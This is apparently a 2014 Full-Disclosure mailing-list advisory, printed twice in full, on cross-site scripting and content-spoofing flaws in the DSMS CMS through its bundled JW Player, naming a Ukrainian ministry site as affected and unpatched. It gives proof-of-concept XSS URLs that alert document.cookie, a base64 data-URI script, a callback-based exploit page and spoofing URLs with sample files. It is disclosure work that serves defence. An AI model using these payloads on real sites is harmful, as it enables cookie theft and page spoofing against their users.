Hello list!
There are Cross-Site Scripting and Content Spoofing vulnerabilities in DSMS.
This is commercial CMS. It's used particularly at government site
dsmsu.gov.ua - web site of Ministry of Youth and Sport of Ukraine.
There are also other vulnerabilities in the system, about which I've
informed developers. None of the vulnerabilities were fixed.
-------------------------
Affected products:
-------------------------
Vulnerable are all versions of DSMS.
-------------------------
Affected vendors:
-------------------------
Strebul studio
http://strebul.com
----------
Details:
----------
Cross-Site Scripting (WASC-08):
http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg
Cross-Site Scripting (WASC-08):
If at the site at page with jwplayer.swf (player.swf) there is possibility
(via HTML Injection) to include JS code with callback-function, and there
are 19 such functions in total, then it's possible to conduct XSS attack.
I.e. JS-callbacks can be used for XSS attack.
Example of exploit:
<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
flashplayer: "jwplayer.swf",
file: "1.flv",
autostart: true,
height: 300,
width: 480,
events: {
onReady: function() { alert(document.cookie); },
onComplete: function() { alert(document.cookie); },
onBufferChange: function() { alert(document.cookie); },
onBufferFull: function() { alert(document.cookie); },
onError: function() { alert(document.cookie); },
onFullscreen: function() { alert(document.cookie); },
onMeta: function() { alert(document.cookie); },
onMute: function() { alert(document.cookie); },
onPlaylist: function() { alert(document.cookie); },
onPlaylistItem: function() { alert(document.cookie); },
onResize: function() { alert(document.cookie); },
onBeforePlay: function() { alert(document.cookie); },
onPlay: function() { alert(document.cookie); },
onPause: function() { alert(document.cookie); },
onBuffer: function() { alert(document.cookie); },
onSeek: function() { alert(document.cookie); },
onIdle: function() { alert(document.cookie); },
onTime: function() { alert(document.cookie); },
onVolume: function() { alert(document.cookie); }
}
});
</script>
Content Spoofing (WASC-12):
Swf-file of JW Player accepts arbitrary addresses in parameters file and
image, which allows to spoof content of flash - i.e. by setting addresses of
video (audio) and/or image files from other site.
http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg
Swf-file of JW Player accepts arbitrary addresses in parameter config, which
allows to spoof content of flash - i.e. by setting address of config file
from other site (parameters file and image in xml-file accept arbitrary
addresses). For loading of config file from other site it needs to have
crossdomain.xml.
http://site/templates/default/js/jwplayer/player.swf?config=1.xml
1.xml
<config>
<file>1.flv</file>
<image>1.jpg</image>
</config>
Swf-file of JW Player accepts arbitrary addresses in parameter playlistfile,
which allows to spoof content of flash - i.e. by setting address of playlist
file from other site (parameters media:content and media:thumbnail in
xml-file accept arbitrary addresses). For loading of playlist file from
other site it needs to have crossdomain.xml.
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200
1.rss
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
<channel>
<title>Example playlist</title>
<item>
<title>Video #1</title>
<description>First video.</description>
<media:content url="1.flv" duration="5" />
<media:thumbnail url="1.jpg" />
</item>
<item>
<title>Video #2</title>
<description>Second video.</description>
<media:content url="2.flv" duration="5" />
<media:thumbnail url="2.jpg" />
</item>
</channel>
</rss>
------------
Timeline:
------------
2013.11.04 - informed administrators of government site. No response, no
fix.
2013.11.13 - announced at my site.
2013.11.18 - informed developers about vulnerabilities in CMS and at
dsmsu.gov.ua. They promised to fix holes in CMS and at web site, but didn't
do it.
2014.02.15 - disclosed at my site (http://websecurity.com.ua/6860/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
There are Cross-Site Scripting and Content Spoofing vulnerabilities in DSMS.
This is commercial CMS. It's used particularly at government site
dsmsu.gov.ua - web site of Ministry of Youth and Sport of Ukraine.
There are also other vulnerabilities in the system, about which I've
informed developers. None of the vulnerabilities were fixed.
-------------------------
Affected products:
-------------------------
Vulnerable are all versions of DSMS.
-------------------------
Affected vendors:
-------------------------
Strebul studio
http://strebul.com
----------
Details:
----------
Cross-Site Scripting (WASC-08):
http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg
Cross-Site Scripting (WASC-08):
If at the site at page with jwplayer.swf (player.swf) there is possibility
(via HTML Injection) to include JS code with callback-function, and there
are 19 such functions in total, then it's possible to conduct XSS attack.
I.e. JS-callbacks can be used for XSS attack.
Example of exploit:
<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
flashplayer: "jwplayer.swf",
file: "1.flv",
autostart: true,
height: 300,
width: 480,
events: {
onReady: function() { alert(document.cookie); },
onComplete: function() { alert(document.cookie); },
onBufferChange: function() { alert(document.cookie); },
onBufferFull: function() { alert(document.cookie); },
onError: function() { alert(document.cookie); },
onFullscreen: function() { alert(document.cookie); },
onMeta: function() { alert(document.cookie); },
onMute: function() { alert(document.cookie); },
onPlaylist: function() { alert(document.cookie); },
onPlaylistItem: function() { alert(document.cookie); },
onResize: function() { alert(document.cookie); },
onBeforePlay: function() { alert(document.cookie); },
onPlay: function() { alert(document.cookie); },
onPause: function() { alert(document.cookie); },
onBuffer: function() { alert(document.cookie); },
onSeek: function() { alert(document.cookie); },
onIdle: function() { alert(document.cookie); },
onTime: function() { alert(document.cookie); },
onVolume: function() { alert(document.cookie); }
}
});
</script>
Content Spoofing (WASC-12):
Swf-file of JW Player accepts arbitrary addresses in parameters file and
image, which allows to spoof content of flash - i.e. by setting addresses of
video (audio) and/or image files from other site.
http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg
Swf-file of JW Player accepts arbitrary addresses in parameter config, which
allows to spoof content of flash - i.e. by setting address of config file
from other site (parameters file and image in xml-file accept arbitrary
addresses). For loading of config file from other site it needs to have
crossdomain.xml.
http://site/templates/default/js/jwplayer/player.swf?config=1.xml
1.xml
<config>
<file>1.flv</file>
<image>1.jpg</image>
</config>
Swf-file of JW Player accepts arbitrary addresses in parameter playlistfile,
which allows to spoof content of flash - i.e. by setting address of playlist
file from other site (parameters media:content and media:thumbnail in
xml-file accept arbitrary addresses). For loading of playlist file from
other site it needs to have crossdomain.xml.
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200
1.rss
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
<channel>
<title>Example playlist</title>
<item>
<title>Video #1</title>
<description>First video.</description>
<media:content url="1.flv" duration="5" />
<media:thumbnail url="1.jpg" />
</item>
<item>
<title>Video #2</title>
<description>Second video.</description>
<media:content url="2.flv" duration="5" />
<media:thumbnail url="2.jpg" />
</item>
</channel>
</rss>
------------
Timeline:
------------
2013.11.04 - informed administrators of government site. No response, no
fix.
2013.11.13 - announced at my site.
2013.11.18 - informed developers about vulnerabilities in CMS and at
dsmsu.gov.ua. They promised to fix holes in CMS and at web site, but didn't
do it.
2014.02.15 - disclosed at my site (http://websecurity.com.ua/6860/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/